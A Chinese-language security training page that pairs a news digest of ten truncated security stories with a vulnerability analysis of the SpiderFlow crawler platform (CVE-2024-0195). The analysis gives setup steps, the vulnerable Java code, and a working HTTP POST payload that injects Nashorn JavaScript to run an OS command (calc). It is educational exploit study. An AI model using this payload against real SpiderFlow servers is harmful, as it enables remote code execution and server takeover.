https://www.sentinelone.com/blog/the-many-faces-of-undetected-macos-infostealers-keysteal-atomic-cherrypie-continue-to-adapt/ macOS 平台的多个信息窃取程序已经证明,即使安全公司频繁跟踪并报告新变种,也能够逃避检测。这些恶意软件可以逃避 macOS 的内置反恶意软件系统 XProtect。XProtect 在后台工作,同时扫描下载的文件和应用程序以查找已知的恶意软件签名。尽管苹果不断更新该工具的恶意软件数据库,但由于恶意软件作者的快速响应,信息窃取者几乎立即绕过了
2、研究人员发现2023年针对环境服务行业的DDoS攻击激增
https://blog.cloudflare.com/ddos-threat-report-2023-q4/ 环境服务行业遭遇了基于 HTTP 的分布式拒绝服务 (DDoS) 攻击的激增,占其所有 HTTP 流量的一半。研究人员上周发布的 2023 年第四季度 DDoS 威胁报告中表示,这标志着 DDoS 攻击流量同比增长 61839%。网络攻击的激增恰逢2023 年 11 月 30 日至 12 月 12 日举行的COP 28会议”,并将其描述为“网络威胁形势中令人不安的趋势”。针对环境服务网站的 HTTP 攻击的增加是过去几年每年观察到的更大趋势的一部分,特别是在 COP 26 和 CO
3、Balada木马利用插件漏洞影响超7100个WordPress网站
https://blog.sucuri.net/2024/01/thousands-of-sites-with-popup-builder-compromised-by-balada-injector.html 数千个使用 Popup Builder 插件易受攻击版本的 WordPress 网站已受到名为Balada Injector的恶意软件的攻击。研究人员于 2023 年 1 月首次记录该活动,该活动以一系列周期性攻击波的形式进行,利用安全漏洞 WordPress 插件注入后门,旨在将受感染网站的访问者重定向到虚假技术支持页面、欺诈性彩票中奖和推送通知诈骗。Sucuri 随后的调查结果揭
4、Rapid SCADA 中的七个漏洞使工业组织面临攻击
https://www.securityweek.com/unpatched-rapid-scada-vulnerabilities-could-expose-industrial-organizations-to-attacks/ Rapid SCADA 开源工业自动化平台受到多个漏洞的影响,这些漏洞可能允许黑客访问敏感的工业系统,但这些缺陷仍未修补。
5、UEFI中开源参考实现中的九个漏洞可能会产生严重影响
https://securityaffairs.com/157683/hacking/pixiefail-uefi-vulnerabilities.html 专家们在 UEFI 开源参考实现的网络协议栈中发现了多个缺陷,统称为 PixieFail。PixieFail 问题可被利用实现远程代码执行、敏感信息泄露、拒绝服务 (DoS) 和网络会话劫持攻击。
6、新的恶意软件针对Docker服务用于挖矿和刷流量
https://thehackernews.com/2024/01/new-docker-malware-steals-cpu-for.html 易受攻击的 Docker 服务正成为一项新颖活动的目标,在该活动中,威胁行为者正在部署 XMRig 加密货币挖矿程序以及 9Hits Viewer 软件,作为多管齐下的货币化策略的一部分。
7、TensorFlow CI/CD 缺陷可能使供应链遭受中毒攻击
https://thehackernews.com/2024/01/tensorflow-cicd-flaw-exposed-supply.html 在开源TensorFlow机器学习框架中发现的持续集成和持续交付 (CI/CD) 错误配置可能会被用来策划供应链攻击。攻击者可能会滥用这些错误配置,“通过恶意拉取请求破坏 TensorFlow 的构建代理,从而对 GitHub 和 PyPi 上的 TensorFlow 版本进行供应链破坏” 。
8、西班牙地方政府遭勒索攻击,被索要 1000 万欧元赎金
https://www.secrss.com/articles/62902 据报道,攻击者向卡尔维亚市政府索要1000万欧元赎金,该市市长称绝对不会支付,此前西班牙加入了《反勒索软件倡议》。
9、Anthropic 警告AI中毒可能导致开源大模型变成潜伏的间谍
https://arstechnica.com/information-technology/2024/01/ai-poisoning-could-turn-open-models-into-destructive-sleeper-agents-says-anthropic/ 开发 Claude AI 聊天机器人的 Anthropic 公司研究人员发表论文,警告 AI 中毒可能导致开源大模型变成潜伏的间谍。研究人员训练了三个含有后门的大模型,它们能根据用户输入指令的差异输出安全的代码或能被利用的漏洞代码。
10、国内首例非法爬虫纠纷案终审宣判微博运营方获赔2000万元
https://www.ithome.com/0/745/564.htm 据广东省高级人民法院官方公众号消息,国内首例非法调用服务器 API 接口获取数据予以交易转卖案件尘埃落定。广东省高级人民法院对微梦公司诉简亦迅公司及深圳分公司不正当竞争纠纷案二审公开宣判,驳回上诉,维持原判:全额支持微梦公司诉请赔偿经济损失 2000 万元。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
SpiderFlow爬虫平台漏洞利用分析(CVE-2024-0195)
1. 漏洞介绍
SpiderFlow爬虫平台项目中
spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行任意的 JavaScript 代码,从而导致代码注入,并允许远程发起攻击,可导致服务器失陷。
2. 流程图分析
3. 搭建过程
1. IDEA Gitee 快速搭建
URL : https://gitee.com/jmxd/spider-flow.git
2. 数据库搭建
我这里使用的是MySQL5.7,然后使用Navicat运行项目中spider-flow\db\spiderflow.sql这个SQL文件会在数据库中自动生成所需要的数据库:
3. 数据库连接
然后修改数据库配置文件application.properties,路径为:spider-flow\spider-flow-web\src\main\resources\application.properties
4. 运行
spider-flow\spider-flow-web\src\main\java\org\spiderflow\SpiderApplication.java
然后访问路径http://localhost:8088/,成功搭建!
4. 利用过程
首先我们直接在IDEA中寻找危险函数eval,使用Ctrl+shift+F文件搜索:
发现这里有个validScript函数调用了eval危险函数:
public static void validScript(String functionName,String parameters,String script) throws Exception {
new ScriptEngineManager().getEngineByName("nashorn").eval(concatScript(functionName,parameters,script));
}
然后这里的我们去看看eval具体执行的参数是怎么生成的:
private static String concatScript(String functionName,String parameters,String script){
StringBuffer scriptBuffer = new StringBuffer();
scriptBuffer.append("function ")
.append(functionName)
.append("(")
.append(parameters == null ? "" : parameters)
.append("){")
.append(script)
.append("}");
return scriptBuffer.toString();
}
可以看到concatScript 方法中,它接受三个参数 functionName、parameters 和 script,然后将它们拼接成一个 JavaScript 函数的字符串。这里它没有任何的过滤。所以我们可以尝试构造恶意的这三个参数实现RCE。
在上面的函数中将产生如下的字符串:
function functionName(parameters){script}
很明显我们可以构造恶意的script来导致RCE:
例如script的值可以为}Java.type('java.lang.Runtime').getRuntime().exec('calc');{
这样的话我们最终的字符串将会变成:
function functionName(parameters){}Java.type('java.lang.Runtime').getRuntime().exec('calc');{}
然后最后在执行的时候就会直接定义一个函数后执行我们的Java恶意代码。
然后我们分析是哪个函数调用了validScript函数
public String saveFunction(Function entity) {
try {
ScriptManager.validScript(entity.getName(),entity.getParameter(),entity.getScript());
super.saveOrUpdate(entity);
init();
return null;
} catch (Exception e) {
logger.error("保存自定义函数出错",e);
return ExceptionUtils.getStackTrace(e);
}
}
然后在FunctionController.java调用了saveFunction
@RestController
@RequestMapping("/function")
public class FunctionController {
......
@RequestMapping("/save")
public String save(Function function){
return functionService.saveFunction(function);
}
......
}
然后我们现在就可以去实际的功能点看需要哪些参数:
于是我们直接写出payload:
POST /function/save HTTP/1.1
Content-Length: 38
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: localhost:8088
id=&name=rce¶meter=rce&script=}Java.type('java.lang.Runtime').getRuntime().exec('calc');{
成功命令执行弹出计算器:
修复方式
过滤好script参数
设置沙箱
5. 总结
这个项目在Gitee上面有7.4K的Star,有3.6K的fork记录,在实际部署上也不是很少,但是漏洞点出的不是很难主要是思路扩展,适宜入门。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

